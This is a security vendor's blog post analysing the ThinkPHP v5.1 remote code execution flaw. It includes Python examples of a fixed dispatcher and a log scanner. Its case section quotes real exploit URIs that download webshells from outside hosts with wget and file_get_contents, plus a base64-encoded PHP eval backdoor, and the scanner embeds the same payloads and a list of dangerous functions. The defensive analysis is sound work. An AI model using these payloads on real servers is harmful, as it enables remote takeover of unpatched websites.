Alibaba Cloud Discovers the Latest ThinkPHP v5 Vulnerability

By Yong Chen

The exploitation of software vulnerabilities is one of the initial steps of a cyber-attack. In engineering schools, they teach you that fixing a defect in the implementation stage costs 6.5 times more than fixing it in the design stage. Applying this principle to ‘cybersecurity school’, we can say that blocking an attack at the vulnerability stage is a dozen times cheaper than stopping it after a device has been compromised by an exploit.

In this blog post we present an analysis of a recently detected vulnerability in the ThinkPHP framework, which exposed 10% of all websites using it to remote takeover. The post provides a detailed explanation of the actual code used by an attacker in an attempt to exploit this vulnerability, as well as precise recommendations on how to protect against it (hint: apply the official fix! Otherwise, get help from Alibaba Cloud’s Threat Detection Service).

Yohai Einav

Principal Security Researcher, SIL

Background

Although an official fix for this critical vulnerability was released on December 10th, 2018, Alibaba Cloud Threat Detection Service (TDS), formerly known as Situational Awareness Service (SAS), has continued to detect multiple attacks exploiting the vulnerability after the fix was published. To ensure that cloud users who do not update their systems in a timely manner are still protected, Alibaba Cloud TDS offers an Attack Alarm service, which uses its web application firewall (WAF) to block exploitation attempts as they occur and so protects all customers.

The following provides a comprehensive analysis of the vulnerability’s context, logic and behavior, along with a real-life case analysis.

Vulnerability Analysis

Versions Affected by the Vulnerability

ThinkPHP v5.1 versions earlier than 5.1.31

How the Vulnerability Works

The “parseUrlPath” function calls the path function and parses the routing information held in “pathinfo”. Inside the function the URL is simply split on slashes (/), and the resulting segments are used without any filtering.

After searching for “pathinfo”, we find that //thinkphp/library/think/Request.php defines the "pathinfo" function, which retrieves the path from the URL.

An attacker can supply the routing data through “$_GET”: the query parameter named by “var_pathinfo” is “s”, so a crafted value of “s” becomes the pathinfo and can carry the function call to be injected.

We also analyzed the app.php code for route scheduling, which operates the controller through the “controller” variable, instantiates the controller, and tracks the controller method.

In //thinkphp/library/think/Loader.php, the controller loader calls "parseModuleAndClass" to parse "$name" and instantiate "$class". When "$name" contains a backslash (\), as tested by "strpos($name, '\\')", it is treated as a fully qualified class name (and method) rather than as a controller name under the module. An attacker can therefore name any class and method to be instantiated and called, and in particular instantiate a namespaced class whose method executes "call_user_func_array".
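The split-then-load behaviour described above, as an added example in Python rather than the framework's PHP: this is a simplified model of the dispatcher written for this post, not ThinkPHP's own code. The class-name layout, the `RouteError` type and the allow-list regex are assumptions modelled on what the analysis describes; the regex stands in for the kind of controller-name validation a fixed dispatcher needs so that a backslash can never reach the class loader.

```python
import re

# Added example, not ThinkPHP's own code: a simplified Python model of the
# route handling described above. Class-name layout and the validation
# regex are assumptions modelled on the behaviour the post describes.

# Assumption: a valid controller segment starts with a letter and contains
# only ASCII word characters or dots, so a backslash never reaches the loader.
CONTROLLER_NAME = re.compile(r'^[A-Za-z][\w.]*$', re.ASCII)
DEFAULTS = ['index', 'index', 'index']  # fallback module, controller, action


class RouteError(Exception):
    """Raised by the fixed dispatcher for a controller name it will not load."""


def parse_url_path(pathinfo):
    """Split pathinfo on '/' only, with no filtering, like the vulnerable parseUrlPath."""
    return [seg for seg in pathinfo.strip('/').split('/') if seg]


def resolve_controller(module, name):
    """Mirror the loader rule described above: a segment containing a backslash is
    taken as a fully qualified class name instead of app\\<module>\\controller\\<Name>."""
    if '\\' in name:
        return name
    return 'app\\%s\\controller\\%s' % (module, name[:1].upper() + name[1:])


def dispatch_vulnerable(pathinfo):
    """Resolve module/controller/action without validating the controller segment."""
    module, controller, action = (parse_url_path(pathinfo) + DEFAULTS)[:3]
    return {'module': module, 'class': resolve_controller(module, controller), 'action': action}


def dispatch_fixed(pathinfo):
    """Same resolution, but reject any controller segment outside the allow-list."""
    module, controller, action = (parse_url_path(pathinfo) + DEFAULTS)[:3]
    if not CONTROLLER_NAME.match(controller):
        raise RouteError('controller not exists: ' + controller)
    return {'module': module, 'class': resolve_controller(module, controller), 'action': action}


def rejected_by_fix(pathinfo):
    """True when the fixed dispatcher refuses the route."""
    try:
        dispatch_fixed(pathinfo)
    except RouteError:
        return True
    return False


if __name__ == '__main__':
    # Constructed routes: a normal one and one that smuggles a namespaced class name.
    for route in ('index/user/list', 'index/some\\namespaced\\Klass/run'):
        print(route, '->', dispatch_vulnerable(route)['class'],
              '| rejected by fix:', rejected_by_fix(route))
```

The point of the model is the contrast: with no check, the second route resolves to whatever namespaced class the caller typed, while the allow-list turns it into a routing error before any class is loaded.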

Vulnerability Reproduction

Real-Life Case of a Vulnerability Attack

The following summarizes the webshell delivery methods observed in the wild and singles out the most popular ones:

1. Exploit the vulnerability, remotely run download commands.

  1. An attacker remotely downloads a webshell backdoor through wget and runs the command to obtain server permissions.
  2. The constructed attack URI: “/admin.php?s=admin/thinkapp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget+-O+help.php+http%3a%2f%2ftzrj.host.smartgslb.com%2fhelp.php.txt”
  3. The webshell is downloaded by running the command “wget -O help.php http://tzrj.host.smartgslb.com/help.php.txt”.

The following screenshot shows the function list of this webshell:

2. Download webshell remotely by using the file_get_contents and file_put_contents functions.

  1. The constructed attack URI: “/?s=admin/thinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=file_put_contents('content.php',file_get_contents('http://jzy1115.host3v.vip'))”

The following screenshot shows the functions of the webshell:

3. Put a one-liner webshell by using the file_put_contents function.

  1. The constructed attack URI (base64 encoded to avoid detection): “/admin.php?s=admin/thinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=file_put_contents('./vendor/autoclass.php',base64_decode('PD9waHAgJHBhc3M9JF9QT1NUWyczNjB2ZXJ5J107ZXZhbCgkcGFzcyk7Pz4='))”
  2. The string decodes as follows: “<?php $pass=$_POST['360very'];eval($pass);?>”
  3. The malicious code is written to “./vendor/autoclass.php”.
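A defender's check for the three delivery methods above, written as an added example (not Alibaba Cloud TDS code and not part of the original post): it parses access-log request lines, decodes the query string, and flags the route and function parameters that recur in the URIs quoted in this post, including a payload hidden behind base64_decode as in method 3. The log lines, IP addresses and the generic namespaced route are constructed for the example; the three exploit URIs are the ones quoted above.

```python
import re
import base64
import binascii
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Added example, not Alibaba Cloud's or ThinkPHP's code: a small access-log
# scanner that flags requests matching the exploitation patterns this post
# describes. The log lines are constructed; the request targets in lines 2-4
# are the URIs quoted above, line 5 is a generic namespaced route.

SUSPICIOUS_FUNCS = {
    'call_user_func_array', 'call_user_func', 'shell_exec', 'system', 'passthru',
    'exec', 'assert', 'eval', 'file_put_contents', 'file_get_contents',
}
# request line inside a common/combined log entry: "GET /path?query HTTP/1.1"
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
B64_LITERAL = re.compile(r'[A-Za-z0-9+/]{16,}={0,2}')


def _decoded_base64(value):
    """Decode every base64-looking literal in value (covers base64_decode('...') obfuscation)."""
    out = []
    for m in B64_LITERAL.finditer(value):
        try:
            out.append(base64.b64decode(m.group(0), validate=True).decode('utf-8', 'replace'))
        except (binascii.Error, ValueError):
            pass
    return out


def inspect_target(target):
    """Return sorted reasons why a request target looks like an exploitation attempt."""
    reasons = set()
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    # parse_qs decodes once; a second decode catches double-encoded route values
    route = unquote_plus(params.get('s', [''])[0])
    if '\\' in route:
        reasons.add('backslash in route parameter s (namespace injection)')
    if route.lower().endswith('/invokefunction'):
        reasons.add('route targets invokefunction')
    for key, values in params.items():
        if key == 's':
            continue
        for value in values:
            for text in [value] + _decoded_base64(value):
                for func in SUSPICIOUS_FUNCS:
                    if re.search(r'\b%s\b' % re.escape(func), text):
                        reasons.add('%s in parameter %s' % (func, key))
    return sorted(reasons)


def scan_log(lines):
    """Return (line_number, target, reasons) for every line that triggers a rule."""
    hits = []
    for number, line in enumerate(lines, 1):
        m = REQUEST_LINE.search(line)
        if m:
            reasons = inspect_target(m.group('target'))
            if reasons:
                hits.append((number, m.group('target'), reasons))
    return hits


# Constructed sample log (not real traffic); quotes and parentheses are percent-encoded
# the way a client would send them.
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Dec/2018:10:01:02 +0800] "GET /index.php?s=index/user/list HTTP/1.1" 200 512',
    '203.0.113.8 - - [12/Dec/2018:10:01:05 +0800] "GET /admin.php?s=admin/thinkapp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget+-O+help.php+http%3a%2f%2ftzrj.host.smartgslb.com%2fhelp.php.txt HTTP/1.1" 200 73',
    '203.0.113.9 - - [12/Dec/2018:10:02:11 +0800] "GET /?s=admin/thinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=file_put_contents%28%27content.php%27%2Cfile_get_contents%28%27http://jzy1115.host3v.vip%27%29%29 HTTP/1.1" 200 0',
    '203.0.113.10 - - [12/Dec/2018:10:03:40 +0800] "GET /admin.php?s=admin/thinkapp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=file_put_contents%28%27./vendor/autoclass.php%27%2Cbase64_decode%28%27PD9waHAgJHBhc3M9JF9QT1NUWyczNjB2ZXJ5J107ZXZhbCgkcGFzcyk7Pz4=%27%29%29 HTTP/1.1" 200 0',
    '203.0.113.11 - - [12/Dec/2018:10:04:02 +0800] "GET /index.php?s=index/some%5Cnamespaced%5CKlass/run HTTP/1.1" 404 0',
]

if __name__ == '__main__':
    for number, target, reasons in scan_log(SAMPLE_LOG):
        print('line %d: %s' % (number, '; '.join(reasons)))
```

Decoding before matching is what makes the base64 case visible: the raw line only mentions assert and file_put_contents, while the decoded literal adds the eval call that the written file will expose. The same scanner can be pointed at a real log file by replacing SAMPLE_LOG with the file's lines.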

Vulnerability’s Impact and Attack Trends

The graph above shows the sharp increase in the number of attacked websites, indicating that the vulnerability is automatically exploited at a large scale soon after being exposed.

Based on the team’s previous experience with the exploitation of vulnerabilities, we believe that this vulnerability may be exploited in a variety of additional ways. It is therefore recommended that all enterprises upgrade their ThinkPHP framework to the latest version as soon as possible to protect their websites against attacks and prevent their servers from being compromised.

Security Recommendations

For more information about this vulnerability, see https://blog.thinkphp.cn/869075.

Reference

https://www.alibabacloud.com/blog/alibaba-cloud-discovers-the-latest-thinkphp-v5-vulnerability_594307?spm=a2c41.12450928.0.0
